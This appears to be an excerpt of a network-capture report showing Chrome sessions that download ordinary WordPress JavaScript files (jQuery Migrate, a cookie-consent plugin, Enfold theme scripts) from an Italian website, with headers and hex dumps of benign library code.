                                                                                                                                              Data Ascii: /*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              66192.168.2.164978789.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:00 UTC612OUTGET /wp-content/plugins/cookie-law-info/legacy/public/js/cookie-law-info-public.js?ver=3.0.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:00 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:00 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 34179
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Fri, 25 Nov 2022 09:48:11 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:00 UTC16107INData Raw: 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 20 3d 20 28 74 79 70 65 6f 66 20 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 20 3a 20 27 76 69 65 77 65 64 5f 63 6f 6f 6b 69 65 5f 70 6f 6c 69 63 79 27 29 3b 0a 43 4c 49 5f 50 52 45 46 45 52 4e 43 45 5f 43 4f 4f 4b 49 45 20 3d 20 28 74 79 70 65 6f 66 20 43 4c 49 5f 50 52 45 46 45 52 4e 43 45 5f 43 4f 4f 4b 49 45 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 43 4c 49 5f 50 52 45 46 45 52 4e 43 45 5f 43 4f 4f 4b 49 45 20 3a 20 27 43 6f 6f 6b 69 65 4c 61 77 49 6e 66 6f 43 6f 6e 73 65 6e 74 27 29 3b 0a 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f
                                                                                                                                              Data Ascii: CLI_ACCEPT_COOKIE_NAME = (typeof CLI_ACCEPT_COOKIE_NAME !== 'undefined' ? CLI_ACCEPT_COOKIE_NAME : 'viewed_cookie_policy');CLI_PREFERNCE_COOKIE = (typeof CLI_PREFERNCE_COOKIE !== 'undefined' ? CLI_PREFERNCE_COOKIE : 'CookieLawInfoConsent');CLI_ACCEPT_CO
                                                                                                                                              2025-01-03 16:33:00 UTC16384INData Raw: 09 09 7d 20 65 6c 73 65 20 69 66 20 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 63 6f 6f 6b 69 65 5f 62 61 72 5f 61 73 20 3d 3d 20 27 77 69 64 67 65 74 27 29 20 7b 0a 09 09 09 74 68 69 73 2e 73 68 6f 77 61 67 61 69 6e 5f 63 6f 6e 66 69 67 2e 62 6f 74 74 6f 6d 20 3d 20 30 3b 0a 09 09 09 69 66 20 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 77 69 64 67 65 74 5f 70 6f 73 69 74 69 6f 6e 20 3d 3d 20 27 6c 65 66 74 27 29 20 7b 0a 09 09 09 09 74 68 69 73 2e 73 68 6f 77 61 67 61 69 6e 5f 63 6f 6e 66 69 67 2e 6c 65 66 74 20 3d 20 73 68 6f 77 61 67 61 69 6e 5f 78 5f 70 6f 73 3b 0a 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 77 69 64 67 65 74 5f 70 6f 73 69 74 69 6f 6e 20 3d 3d 20 27 72 69 67 68 74 27 29 20 7b 0a 09 09 09 09
                                                                                                                                              Data Ascii: } else if (this.settings.cookie_bar_as == 'widget') {this.showagain_config.bottom = 0;if (this.settings.widget_position == 'left') {this.showagain_config.left = showagain_x_pos;} else if (this.settings.widget_position == 'right') {
                                                                                                                                              2025-01-03 16:33:00 UTC1688INData Raw: 70 74 2e 74 79 70 65 20 21 3d 20 73 2e 74 79 70 65 29 20 7b 0a 09 09 09 09 09 69 66 20 28 65 6c 65 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 20 3d 3d 3d 20 27 68 65 61 64 27 29 20 7b 0a 09 09 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 29 3b 0a 09 09 09 09 09 7d 20 65 6c 73 65 20 7b 0a 09 09 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 29 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 09 69 66 20 28 21 24 73 63 72 69 70 74 2e 73 72 63 29 20 7b 0a 09 09 09 09 09 09 63 61 6c 6c 62 61 63 6b 28 29 0a 09 09 09 09 09 7d 0a 09 09 09 09 09 24 73 63 72 69 70 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 24 73 63 72 69 70 74 29 3b 0a 0a 09 09 09 09 7d 20
                                                                                                                                              Data Ascii: pt.type != s.type) {if (elementPosition === 'head') {document.head.appendChild(s);} else {document.body.appendChild(s);}if (!$script.src) {callback()}$script.parentNode.removeChild($script);}


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              67192.168.2.164978889.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:00 UTC581OUTGET /wp-content/themes/enfold/config-wpml/wpml-mod.js?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:00 UTC275INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:00 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 614
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:16:34 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:00 UTC614INData Raw: 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 09 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 09 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 0a 09 7b 09 20 20 20 0a 09 09 2f 2a 2a 0a 09 09 20 2a 20 52 65 6d 6f 76 65 20 54 68 65 6d 65 73 20 64 75 70 6c 69 63 61 74 65 64 20 6c 61 6e 67 75 61 67 65 20 73 77 69 74 63 68 65 72 20 66 6c 61 67 73 20 66 72 6f 6d 20 42 75 72 67 65 72 20 6d 65 6e 75 0a 09 09 20 2a 09 09 2d 20 65 78 69 73 74 20 69 6e 20 73 65 63 6f 6e 64 61 72 79 20 6d 65 6e 75 0a 09 09 20 2a 09 09 2d 20 65 78 69 73 74 20 62 65 73 69 64 65 20 73 65 61 72 63 68 20 69 63 6f 6e 0a 09 09 20 2a 2f 0a 09 09 24 28 27 62 6f 64 79 27 29 2e 6f 6e 28 20 27 61 76 69 61 5f 62 75 72 67 65 72 5f 6c 69 73 74
                                                                                                                                              Data Ascii: (function($){ "use strict";$(document).ready(function(){ /** * Remove Themes duplicated language switcher flags from Burger menu *- exist in secondary menu *- exist beside search icon */$('body').on( 'avia_burger_list


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              68192.168.2.164978989.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:00 UTC575OUTGET /wp-content/themes/enfold/js/avia-compat.js?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:00 UTC276INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:00 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 2106
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:17:10 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:00 UTC2106INData Raw: 2f 2a 20 0a 09 74 68 69 73 20 70 72 65 76 65 6e 74 73 20 64 6f 6d 20 66 6c 69 63 6b 65 72 69 6e 67 20 66 6f 72 20 65 6c 65 6d 65 6e 74 73 20 68 69 64 64 65 6e 20 77 69 74 68 20 6a 73 2c 20 6e 65 65 64 73 20 74 6f 20 62 65 20 6f 75 74 73 69 64 65 20 6f 66 20 64 6f 6d 2e 72 65 61 64 79 20 65 76 65 6e 74 2e 61 6c 73 6f 20 61 64 64 73 20 73 65 76 65 72 61 6c 20 65 78 74 72 61 20 63 6c 61 73 73 65 73 20 66 6f 72 20 62 65 74 74 65 72 20 62 72 6f 77 73 65 72 20 73 75 70 70 6f 72 74 20 0a 09 74 68 69 73 20 69 73 20 61 20 73 65 70 61 72 61 74 65 20 66 69 6c 65 20 74 68 61 74 20 6e 65 65 64 73 20 74 6f 20 62 65 20 6c 6f 61 64 65 64 20 61 74 20 74 68 65 20 74 6f 70 20 6f 66 20 74 68 65 20 70 61 67 65 2e 20 6f 74 68 65 72 20 6a 73 20 66 75 6e 63 74 69 6f 6e 73 20 61
                                                                                                                                              Data Ascii: /* this prevents dom flickering for elements hidden with js, needs to be outside of dom.ready event.also adds several extra classes for better browser support this is a separate file that needs to be loaded at the top of the page. other js functions a


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              69192.168.2.164979089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:00 UTC397OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:01 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:01 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 11224
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Thu, 11 Feb 2021 13:25:28 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:01 UTC11224INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 33 2e 32 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                                                              Data Ascii: /*! jQuery Migrate v3.3.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              70192.168.2.164979289.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:01 UTC568OUTGET /wp-content/themes/enfold/js/avia.js?ver=4.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://www.cipassoitalia.it/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:01 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:01 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 70105
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Mon, 18 Mar 2019 15:17:10 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:01 UTC16107INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 24 29 0a 7b 09 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 09 0a 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 0a 20 20 20 20 7b 09 20 20 20 20 0a 20 20 20 20 20 20 20 20 76 61 72 20 61 76 69 61 62 6f 64 79 63 6c 61 73 73 65 73 20 3d 20 41 76 69 61 42 72 6f 77 73 65 72 44 65 74 65 63 74 69 6f 6e 28 27 68 74 6d 6c 27 29 3b 0a 0a 09 09 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 3d 20 24 2e 61 76 69 61 5f 75 74 69 6c 69 74 69 65 73 20 7c 7c 20 7b 7d 3b 0a 09 09 69 66 28 20 2f 41 6e 64 72 6f 69 64 7c 77 65 62 4f 53 7c 69 50 68 6f 6e 65 7c 69 50 61 64 7c 69 50 6f 64 7c 42 6c 61 63 6b 42 65 72 72 79 7c 49 45 4d 6f 62 69 6c 65 7c 4f 70 65 72 61 20 4d 69 6e 69 2f
                                                                                                                                              Data Ascii: (function($){ "use strict"; $(document).ready(function() { var aviabodyclasses = AviaBrowserDetection('html');$.avia_utilities = $.avia_utilities || {};if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: 20 09 24 2e 41 76 69 61 56 69 64 65 6f 41 50 49 2e 70 6c 61 79 65 72 73 5b 20 66 76 2e 61 74 74 72 28 27 69 64 27 29 2e 72 65 70 6c 61 63 65 28 2f 5f 68 74 6d 6c 35 2f 2c 27 27 29 20 5d 20 3d 20 69 6e 73 74 61 6e 63 65 3b 0a 20 20 20 20 20 20 20 20 20 09 0a 09 09 09 09 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 0a 09 09 09 09 7b 0a 09 09 09 09 09 69 66 20 28 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 70 6c 75 67 69 6e 54 79 70 65 20 3d 3d 20 27 66 6c 61 73 68 27 29 20 0a 09 09 09 09 09 7b 09 0a 09 09 09 09 09 09 6d 65 64 69 61 45 6c 65 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 61 6e 70 6c 61 79 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 66 76 2e 74 72 69 67 67 65 72 28 27 61 76 2d 6d 65 64 69 61 6a 73 2d
                                                                                                                                              Data Ascii: $.AviaVideoAPI.players[ fv.attr('id').replace(/_html5/,'') ] = instance; setTimeout(function(){if (mediaElement.pluginType == 'flash') {mediaElement.addEventListener('canplay', function() { fv.trigger('av-mediajs-
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: 67 65 2d 69 74 65 6d 2d 27 29 20 3e 3d 20 30 20 29 0a 09 09 09 09 09 09 09 09 09 09 7b 0a 09 09 09 09 09 09 09 09 09 09 09 6e 65 77 5f 6c 69 2e 61 64 64 43 6c 61 73 73 28 76 61 6c 75 65 29 3b 0a 09 09 09 09 09 09 09 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 09 7d 29 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 09 0a 09 09 09 09 09 61 70 70 65 6e 64 5f 74 6f 2e 61 70 70 65 6e 64 28 6e 65 77 5f 6c 69 29 3b 0a 09 09 09 09 09 0a 09 09 09 09 09 69 66 28 73 75 62 69 74 65 6d 73 2e 6c 65 6e 67 74 68 29 0a 09 09 09 09 09 7b 0a 09 09 09 09 09 09 6e 65 77 5f 75 6c 20 3d 20 24 28 27 3c 75 6c 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 22 3e 27 29 2e 61 70 70 65 6e 64 54 6f 28 6e 65 77 5f 6c 69 29 3b
                                                                                                                                              Data Ascii: ge-item-') >= 0 ){new_li.addClass(value);return false;}});}append_to.append(new_li);if(subitems.length){new_ul = $('<ul class="sub-menu">').appendTo(new_li);
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: 6f 72 6d 2e 61 74 74 72 28 27 64 61 74 61 2d 72 65 73 75 6c 74 73 5f 73 74 79 6c 65 27 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 73 75 6c 74 73 5f 63 73 73 20 3d 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 72 65 73 75 6c 74 73 5f 63 73 73 2c 20 72 65 73 75 6c 74 73 5f 73 74 79 6c 65 29 3b 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 61 64 64 20 63 6c 61 73 73 20 69 66 20 66 6f 6e 74 20 63 6f 6c 6f 72 20 69 73 20 61 70 70 6c 69 65 64 2c 20 73 6f 20 77 65 20 63 61 6e 20 75 73 65 20 63 6f 6c 6f 72 3a 20 69 6e 68 65 72 69 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 22 63 6f 6c 6f 72 22 20 69 6e 20 72 65 73 75 6c 74 73 5f 63 73 73 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                              Data Ascii: orm.attr('data-results_style')); results_css = Object.assign(results_css, results_style); // add class if font color is applied, so we can use color: inherit if ("color" in results_css) {
                                                                                                                                              2025-01-03 16:33:01 UTC4846INData Raw: 66 20 64 3f 64 3d 64 2e 61 70 70 6c 79 28 63 29 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 64 26 26 28 64 3d 70 61 72 73 65 46 6c 6f 61 74 28 64 29 2c 63 2e 6f 70 74 69 6f 6e 73 2e 6f 66 66 73 65 74 2e 69 6e 64 65 78 4f 66 28 22 25 22 29 3e 2d 31 26 26 28 64 3d 4d 61 74 68 2e 63 65 69 6c 28 72 2e 63 6f 6e 74 65 78 74 44 69 6d 65 6e 73 69 6f 6e 2a 64 2f 31 30 30 29 29 29 2c 61 3d 72 2e 63 6f 6e 74 65 78 74 53 63 72 6f 6c 6c 2d 72 2e 63 6f 6e 74 65 78 74 4f 66 66 73 65 74 2c 63 2e 74 72 69 67 67 65 72 50 6f 69 6e 74 3d 77 2b 61 2d 64 2c 6c 3d 66 3c 72 2e 6f 6c 64 53 63 72 6f 6c 6c 2c 68 3d 63 2e 74 72 69 67 67 65 72 50 6f 69 6e 74 3e 3d 72 2e 6f 6c 64 53 63 72 6f 6c 6c 2c 70 3d 6c 26 26 68 2c 75 3d 21 6c 26 26 21 68 2c 21 79 26 26 70 3f 28 63 2e
                                                                                                                                              Data Ascii: f d?d=d.apply(c):"string"==typeof d&&(d=parseFloat(d),c.options.offset.indexOf("%")>-1&&(d=Math.ceil(r.contextDimension*d/100))),a=r.contextScroll-r.contextOffset,c.triggerPoint=w+a-d,l=f<r.oldScroll,h=c.triggerPoint>=r.oldScroll,p=l&&h,u=!l&&!h,!y&&p?(c.


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              71192.168.2.164979389.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:33:01 UTC431OUTGET /wp-content/plugins/cookie-law-info/legacy/public/js/cookie-law-info-public.js?ver=3.0.5 HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:33:01 UTC277INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:33:01 GMT
                                                                                                                                              Content-Type: text/javascript
                                                                                                                                              Content-Length: 34179
                                                                                                                                              Connection: close
                                                                                                                                              Last-Modified: Fri, 25 Nov 2022 09:48:11 GMT
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:33:01 UTC16107INData Raw: 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 20 3d 20 28 74 79 70 65 6f 66 20 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 20 3a 20 27 76 69 65 77 65 64 5f 63 6f 6f 6b 69 65 5f 70 6f 6c 69 63 79 27 29 3b 0a 43 4c 49 5f 50 52 45 46 45 52 4e 43 45 5f 43 4f 4f 4b 49 45 20 3d 20 28 74 79 70 65 6f 66 20 43 4c 49 5f 50 52 45 46 45 52 4e 43 45 5f 43 4f 4f 4b 49 45 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 43 4c 49 5f 50 52 45 46 45 52 4e 43 45 5f 43 4f 4f 4b 49 45 20 3a 20 27 43 6f 6f 6b 69 65 4c 61 77 49 6e 66 6f 43 6f 6e 73 65 6e 74 27 29 3b 0a 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f
                                                                                                                                              Data Ascii: CLI_ACCEPT_COOKIE_NAME = (typeof CLI_ACCEPT_COOKIE_NAME !== 'undefined' ? CLI_ACCEPT_COOKIE_NAME : 'viewed_cookie_policy');CLI_PREFERNCE_COOKIE = (typeof CLI_PREFERNCE_COOKIE !== 'undefined' ? CLI_PREFERNCE_COOKIE : 'CookieLawInfoConsent');CLI_ACCEPT_CO
                                                                                                                                              2025-01-03 16:33:01 UTC16384INData Raw: 09 09 7d 20 65 6c 73 65 20 69 66 20 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 63 6f 6f 6b 69 65 5f 62 61 72 5f 61 73 20 3d 3d 20 27 77 69 64 67 65 74 27 29 20 7b 0a 09 09 09 74 68 69 73 2e 73 68 6f 77 61 67 61 69 6e 5f 63 6f 6e 66 69 67 2e 62 6f 74 74 6f 6d 20 3d 20 30 3b 0a 09 09 09 69 66 20 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 77 69 64 67 65 74 5f 70 6f 73 69 74 69 6f 6e 20 3d 3d 20 27 6c 65 66 74 27 29 20 7b 0a 09 09 09 09 74 68 69 73 2e 73 68 6f 77 61 67 61 69 6e 5f 63 6f 6e 66 69 67 2e 6c 65 66 74 20 3d 20 73 68 6f 77 61 67 61 69 6e 5f 78 5f 70 6f 73 3b 0a 09 09 09 7d 20 65 6c 73 65 20 69 66 20 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 77 69 64 67 65 74 5f 70 6f 73 69 74 69 6f 6e 20 3d 3d 20 27 72 69 67 68 74 27 29 20 7b 0a 09 09 09 09
                                                                                                                                              Data Ascii: } else if (this.settings.cookie_bar_as == 'widget') {this.showagain_config.bottom = 0;if (this.settings.widget_position == 'left') {this.showagain_config.left = showagain_x_pos;} else if (this.settings.widget_position == 'right') {
